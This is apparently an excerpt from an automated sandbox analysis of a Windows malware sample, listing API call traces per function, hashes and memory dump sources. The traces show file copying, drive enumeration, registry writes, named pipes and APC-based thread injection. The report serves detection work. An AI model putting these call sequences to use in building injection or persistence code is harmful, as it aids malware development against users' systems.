                                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB8193
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,04BA12BE,?,?,?), ref: 04BB81A1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                            • String ID:
                                                            • API String ID: 3635185113-0
                                                            • Opcode ID: 7970bb37baa394b5b7ba524228f7977ee7e41fa29d1a81807bd74efa19eb0e88
                                                            • Instruction ID: 23d639c3e616ecb325c26bb95dff538fbf8aa847a588746f6bf6dbbb7ccb94a0
                                                            • Opcode Fuzzy Hash: 7970bb37baa394b5b7ba524228f7977ee7e41fa29d1a81807bd74efa19eb0e88
                                                            • Instruction Fuzzy Hash: 5621CD32101215EFC3216F64ECC9EBF7BACEF89B51F01041EF585A3250DBA9AC159AB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAB91A, Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB0E2E: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04BB0E73
                                                              • Part of subcall function 04BB0E2E: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04BB0E8B
                                                              • Part of subcall function 04BB0E2E: WaitForSingleObject.KERNEL32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F53
                                                              • Part of subcall function 04BB0E2E: HeapFree.KERNEL32(00000000,?,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F7C
                                                              • Part of subcall function 04BB0E2E: HeapFree.KERNEL32(00000000,04BB2333,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F8C
                                                              • Part of subcall function 04BB0E2E: RegCloseKey.ADVAPI32(00000000,?,00000000,04BB2333,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BB0F95
                                                            • lstrcmp.KERNEL32(?,?), ref: 04BAB991
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BAB9BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BABA6E
                                                            • GetCurrentThread.KERNEL32 ref: 04BABA7F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,04BAC3DA,?,00000001), ref: 04BABABC
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,04BAC3DA,?,00000001), ref: 04BABAD0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04BABADE
                                                            • wsprintfA.USER32 ref: 04BABAF6
                                                              • Part of subcall function 04BB5440: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04BA9999,00000000,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BB544A
                                                              • Part of subcall function 04BB5440: lstrcpy.KERNEL32(00000000,00000000), ref: 04BB546E
                                                              • Part of subcall function 04BB5440: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04BB7991,?,?,?,00000000,?,00000000,00000000), ref: 04BB5475
                                                              • Part of subcall function 04BB5440: lstrcat.KERNEL32(00000000,?), ref: 04BB54CC
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 04BABB01
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04BABB18
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BABB29
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BABB35
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 773763258-0
                                                            • Opcode ID: 51f73e1f8f1c5b3b6d6721d2b5ab44c9cb76baff01dbfe61e41176f159cc9dd2
                                                            • Instruction ID: 4874aa30baab7b6d838cfc2aa3c0007ac8998b4e2e49a1b0c27051575eabd132
                                                            • Opcode Fuzzy Hash: 51f73e1f8f1c5b3b6d6721d2b5ab44c9cb76baff01dbfe61e41176f159cc9dd2
                                                            • Instruction Fuzzy Hash: F9710371904219EFDB11DFA5D884EEEBBB9FB08304F0480A6E614E7220D735B965DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBC186, Relevance: 18.2, APIs: 12, Instructions: 183synchronizationstringthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04BBC1AD
                                                            • memcpy.NTDLL(?,?,00000010), ref: 04BBC1D0
                                                            • memset.NTDLL ref: 04BBC21C
                                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 04BBC230
                                                            • GetLastError.KERNEL32 ref: 04BBC25E
                                                            • GetLastError.KERNEL32 ref: 04BBC2A5
                                                            • GetLastError.KERNEL32 ref: 04BBC2C4
                                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 04BBC2FE
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04BBC30C
                                                            • GetLastError.KERNEL32 ref: 04BBC386
                                                            • ReleaseMutex.KERNEL32(?), ref: 04BBC398
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BBC3AE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                            • String ID:
                                                            • API String ID: 4037736292-0
                                                            • Opcode ID: 0bd7ec92d40002c03593c5be8b31e13d5e09dc8889fe6967d09a8c58d8754056
                                                            • Instruction ID: 901ea3bb3fdb666c47b9de76160a2975deb07e4f41a6266dc08774cb7c226c18
                                                            • Opcode Fuzzy Hash: 0bd7ec92d40002c03593c5be8b31e13d5e09dc8889fe6967d09a8c58d8754056
                                                            • Instruction Fuzzy Hash: DD615C71508301AFD720DF65D844AABBBF9FF88711F40892EF596D2180E7B5E904CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA5D7E, Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000), ref: 04BA5D94
                                                            • lstrlen.KERNEL32(?), ref: 04BA5D9C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BA5DAC
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BA5DCB
                                                            • lstrlen.KERNEL32(?), ref: 04BA5DE0
                                                            • lstrlen.KERNEL32(?), ref: 04BA5DEE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 04BA5E3C
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04BA5E60
                                                            • lstrlen.KERNEL32(?), ref: 04BA5E93
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04BA5EBE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04BA5ED5
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04BA5EE2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                            • String ID:
                                                            • API String ID: 904523553-0
                                                            • Opcode ID: d2494729c03d1c55dd2224234c5c98f027a4a2994b042f197c7aa4794ded89e1
                                                            • Instruction ID: 46737cb297586994c0678fe3a9dff576b8234db0e991422a536c439a00f14d31
                                                            • Opcode Fuzzy Hash: d2494729c03d1c55dd2224234c5c98f027a4a2994b042f197c7aa4794ded89e1
                                                            • Instruction Fuzzy Hash: F8416A7190420AFFDF219F64CC84AAE7BB9FB48310F1144A6F911A7250DB35FA61DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBAD22, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BBAD54
                                                            • WaitForSingleObject.KERNEL32(00000404,00000000), ref: 04BBAD76
                                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 04BBAD96
                                                            • GetLastError.KERNEL32 ref: 04BBADA0
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BBADC4
                                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 04BBAE07
                                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04BBAE10
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBAE19
                                                            • CloseHandle.KERNEL32(?), ref: 04BBAE2E
                                                            • GetLastError.KERNEL32 ref: 04BBAE3B
                                                            • CloseHandle.KERNEL32(?), ref: 04BBAE48
                                                            • RtlExitUserThread.NTDLL(000000FF), ref: 04BBAE5E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                            • String ID:
                                                            • API String ID: 4053378866-0
                                                            • Opcode ID: f6a80504201a355e6ca93c15bc9e2715b902fdfee3a9c9053ef21a058e49ae4e
                                                            • Instruction ID: 6d77c9ee8a3e3b4f84ef49f869a392c3f4a5089e9d2c0a3101bcc2f339af67ef
                                                            • Opcode Fuzzy Hash: f6a80504201a355e6ca93c15bc9e2715b902fdfee3a9c9053ef21a058e49ae4e
                                                            • Instruction Fuzzy Hash: A9316070404305AFEB119F24CC888AFBBA9FF4C315F104A2AF5A5D2190D7B4AE159BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB78F6, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BB7920
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BB7936
                                                            • GetCurrentThread.KERNEL32 ref: 04BB7947
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                              • Part of subcall function 04BA997D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BA99E8
                                                              • Part of subcall function 04BA997D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04BB7991,?,?,?,00000000), ref: 04BA9A10
                                                            • HeapFree.KERNEL32(00000000,?,04BA1F4D,?,?,?,?,?,00000000,?,00000000,00000000,?), ref: 04BB79C1
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 04BB79CD
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 04BB7A1C
                                                            • wsprintfA.USER32 ref: 04BB7A34
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04BA1F4D), ref: 04BB7A3F
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04BA1F4D), ref: 04BB7A56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                            • String ID: W
                                                            • API String ID: 630447368-655174618
                                                            • Opcode ID: 810ed3286c868ca2cdd82910976e24f83abfd3cf0f4b3bb3759f9818c7ae9429
                                                            • Instruction ID: d0244a63d4e8f7abdfeaaa553f2aa2a43cfdc867b5a8986150d76baa8cc07df8
                                                            • Opcode Fuzzy Hash: 810ed3286c868ca2cdd82910976e24f83abfd3cf0f4b3bb3759f9818c7ae9429
                                                            • Instruction Fuzzy Hash: 7D415775900119FBDF119FA1DC88DEEBFB9FF89344B044466E949A3210DB78AA50DBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BABCAC, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04BABCE2
                                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04BABCF7
                                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04BABD1F
                                                            • HeapFree.KERNEL32(00000000,00000001), ref: 04BABD60
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BABD70
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA6562), ref: 04BABD83
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA6562), ref: 04BABD92
                                                            • HeapFree.KERNEL32(00000000,?,?,04BA6562,?,00000001,?,?), ref: 04BABDDC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE00
                                                            • HeapFree.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE25
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,04BA6562,?,00000001), ref: 04BABE3A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CloseCreate
                                                            • String ID:
                                                            • API String ID: 4126010716-0
                                                            • Opcode ID: 50aa81dde7fdaef7fb9a33d01ad8bd3e3685f63880f3facae535d2d322bc0b5c
                                                            • Instruction ID: 9e9150876dd1b83a44545a0d52335743ff765d8291bf68cea927e6ce310da831
                                                            • Opcode Fuzzy Hash: 50aa81dde7fdaef7fb9a33d01ad8bd3e3685f63880f3facae535d2d322bc0b5c
                                                            • Instruction Fuzzy Hash: 7851B4B5C0810DEFDF11DFA5D8849EEBBB9FB08345F10446AE624A2210D335AE65DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB3430, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04BB344A
                                                            • PathFindFileNameW.SHLWAPI(?), ref: 04BB3460
                                                            • lstrlenW.KERNEL32(00000000), ref: 04BB34A3
                                                            • RtlAllocateHeap.NTDLL(00000000,04BC4AA2), ref: 04BB34B9
                                                            • memcpy.NTDLL(00000000,00000000,04BC4AA0), ref: 04BB34CC
                                                            • _wcsupr.NTDLL ref: 04BB34D7
                                                            • lstrlenW.KERNEL32(?,04BC4AA0), ref: 04BB3510
                                                            • RtlAllocateHeap.NTDLL(00000000,?,04BC4AA0), ref: 04BB3525
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04BB353B
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04BB3560
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB356F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 3868788785-0
                                                            • Opcode ID: 22f5a9e72757939bd1e9cea4c6d68643ebc7b2335376c0857b871d7e36f9a321
                                                            • Instruction ID: a850935660ca67e215e985bc13402fb5f1921fac401d846557c25b00bc174bde
                                                            • Opcode Fuzzy Hash: 22f5a9e72757939bd1e9cea4c6d68643ebc7b2335376c0857b871d7e36f9a321
                                                            • Instruction Fuzzy Hash: 0F31C432504214ABC7215F78ECC8DBF7BE8EB49321B15865AF991D3181DBB9FC448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBA5F6, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcscpy.NTDLL ref: 04BBA62A
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 04BBA636
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BBA647
                                                            • memset.NTDLL ref: 04BBA664
                                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 04BBA672
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04BBA680
                                                            • GetDriveTypeW.KERNEL32(?), ref: 04BBA68E
                                                            • lstrlenW.KERNEL32(?), ref: 04BBA69A
                                                            • wcscpy.NTDLL ref: 04BBA6AC
                                                            • lstrlenW.KERNEL32(?), ref: 04BBA6C6
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BBA6DF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                            • String ID:
                                                            • API String ID: 3888849384-0
                                                            • Opcode ID: 5ffe7c21e9c56a0d15ac99b44b000d5bf3e80f0e416cc927fca75aef60ceb517
                                                            • Instruction ID: 1f05a5c5e38468f5f99a7adea7086ca9b5bb3fea7a882cd860fc4e1e99d1daf5
                                                            • Opcode Fuzzy Hash: 5ffe7c21e9c56a0d15ac99b44b000d5bf3e80f0e416cc927fca75aef60ceb517
                                                            • Instruction Fuzzy Hash: D5312572C00108FFCB11ABA5EC88CEEBFB9EF49365B108056E145E3151EB75AA55DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAA5EC, Relevance: 16.6, APIs: 11, Instructions: 94memoryregistrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BAA5FD
                                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04BA1E48,?,00000094,00000000,?,?,00000000,?), ref: 04BAA615
                                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04BAA624
                                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04BA1E48,?,00000094,00000000,?,?,00000000,?), ref: 04BAA637
                                                            • GetTickCount.KERNEL32 ref: 04BAA63B
                                                            • wsprintfA.USER32 ref: 04BAA652
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04BAA68D
                                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04BAA6AA
                                                            • lstrlen.KERNEL32(00000000), ref: 04BAA6B4
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BAA6D0
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 04BAA6DE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 1404517112-0
                                                            • Opcode ID: 02ef5d93f79ff19e9e74f8dedbef95fbaba044eac96f131b47569ed221c9e56e
                                                            • Instruction ID: 91ba04cf558db762feae44b58b598c56a2b9b32dc7b75d73a473edeb147557ab
                                                            • Opcode Fuzzy Hash: 02ef5d93f79ff19e9e74f8dedbef95fbaba044eac96f131b47569ed221c9e56e
                                                            • Instruction Fuzzy Hash: 64313475504209FFDB109FA5ECC8DAF7BACEB49395B048066F909D7100D638AE65DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB54DA, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BB5551
                                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 04BB5570
                                                              • Part of subcall function 04BAB7B9: wsprintfA.USER32 ref: 04BAB7CC
                                                              • Part of subcall function 04BAB7B9: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BAB7DE
                                                              • Part of subcall function 04BAB7B9: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BAB808
                                                              • Part of subcall function 04BAB7B9: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAB81B
                                                              • Part of subcall function 04BAB7B9: CloseHandle.KERNEL32(?), ref: 04BAB824
                                                            • GetLastError.KERNEL32 ref: 04BB5843
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04BB5853
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04BB5864
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BB5872
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                                            • String ID:
                                                            • API String ID: 1258333524-0
                                                            • Opcode ID: f501b915d9b7277d85ce8857799e3df85a256be418dc3911634b9a07482a7cfb
                                                            • Instruction ID: f8d75cdab56b49f3c3eff05ae9fd2c708180c183875cac695412b859baef6096
                                                            • Opcode Fuzzy Hash: f501b915d9b7277d85ce8857799e3df85a256be418dc3911634b9a07482a7cfb
                                                            • Instruction Fuzzy Hash: F2B13A71500209EFEB309F21DC84EAA7BBAFF08349F104969F999D6150E7B4E954CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BC1D93, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(05C8B060,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DB6
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DC5
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 04BC1DD2
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04BC1DEA
                                                            • lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04BC1DF6
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BC1E12
                                                            • wsprintfA.USER32 ref: 04BC1EF4
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04BC1F41
                                                            • InterlockedExchange.KERNEL32(04BCC0BC,00000000), ref: 04BC1F5F
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BC1FA0
                                                              • Part of subcall function 04BA24CF: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BA24F8
                                                              • Part of subcall function 04BA24CF: memcpy.NTDLL(00000000,?,?), ref: 04BA250B
                                                              • Part of subcall function 04BA24CF: RtlEnterCriticalSection.NTDLL(04BCC328), ref: 04BA251C
                                                              • Part of subcall function 04BA24CF: RtlLeaveCriticalSection.NTDLL(04BCC328), ref: 04BA2531
                                                              • Part of subcall function 04BA24CF: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BA2569
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                                            • String ID:
                                                            • API String ID: 4198405257-0
                                                            • Opcode ID: d3cbbe41d66c567beb08c1f99484a334b58e858234e511e83a416b15a76dcc58
                                                            • Instruction ID: 96eac1d35e6a16310b6483c5687c3457d8aa54fa7058925af502f89a4e28423c
                                                            • Opcode Fuzzy Hash: d3cbbe41d66c567beb08c1f99484a334b58e858234e511e83a416b15a76dcc58
                                                            • Instruction Fuzzy Hash: 0C615D71A0020AEFCB10DFA9DCC4EAE7BB9EB08344F0545AAE905E7201D774E954DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BADD60, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 04BADD70
                                                            • CreateFileW.KERNEL32(04BA1DEA,80000000,00000003,04BCC1A8,00000003,00000000,00000000,?,04BA1DEA,?), ref: 04BADD8D
                                                            • GetLastError.KERNEL32(?,04BA1DEA,?), ref: 04BADE35
                                                              • Part of subcall function 04BAAB88: lstrlen.KERNEL32(00000000,00000000,00000000,00000027,00000000,?,00000000,?,69B25F44,00000000,00000000,00000000), ref: 04BAABBE
                                                              • Part of subcall function 04BAAB88: lstrcpy.KERNEL32(00000000,00000000), ref: 04BAABE2
                                                              • Part of subcall function 04BAAB88: lstrcat.KERNEL32(00000000,00000000), ref: 04BAABEA
                                                            • GetFileSize.KERNEL32(04BA1DEA,00000000,?,00000001,?,04BA1DEA,?), ref: 04BADDC0
                                                            • CreateFileMappingA.KERNEL32(04BA1DEA,04BCC1A8,00000002,00000000,00000000,04BA1DEA), ref: 04BADDD4
                                                            • lstrlen.KERNEL32(04BA1DEA,?,04BA1DEA,?), ref: 04BADDF0
                                                            • lstrcpy.KERNEL32(?,04BA1DEA), ref: 04BADE00
                                                            • GetLastError.KERNEL32(?,04BA1DEA,?), ref: 04BADE08
                                                            • HeapFree.KERNEL32(00000000,04BA1DEA,?,04BA1DEA,?), ref: 04BADE1B
                                                            • CloseHandle.KERNEL32(04BA1DEA,?,00000001,?,04BA1DEA), ref: 04BADE2D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                                            • String ID:
                                                            • API String ID: 194907169-0
                                                            • Opcode ID: 57326386d6fc65d4cf6f139c2eb348fd87244d4b78f93bf1ded878b8fff7be04
                                                            • Instruction ID: c253f5ef6953601c1a3124a0ab4cc3c9e306d45544ce81d765f61f80f6a95d40
                                                            • Opcode Fuzzy Hash: 57326386d6fc65d4cf6f139c2eb348fd87244d4b78f93bf1ded878b8fff7be04
                                                            • Instruction Fuzzy Hash: 0421D771900208FFDB109FA5D8C8E9DBFB9EF18355F10846AF505E7250D7359E549B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBAE65, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,04BA824E,?,00000001), ref: 04BBAE8B
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04BBAE97
                                                            • GetModuleHandleA.KERNEL32(?,05C89732,?,00000000,00000000), ref: 04BBAEB7
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04BBAEBE
                                                            • Thread32First.KERNEL32(00000001,0000001C), ref: 04BBAECE
                                                            • OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 04BBAEE9
                                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 04BBAEFA
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BBAF01
                                                            • Thread32Next.KERNEL32(00000001,0000001C), ref: 04BBAF0A
                                                            • CloseHandle.KERNEL32(00000001), ref: 04BBAF16
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
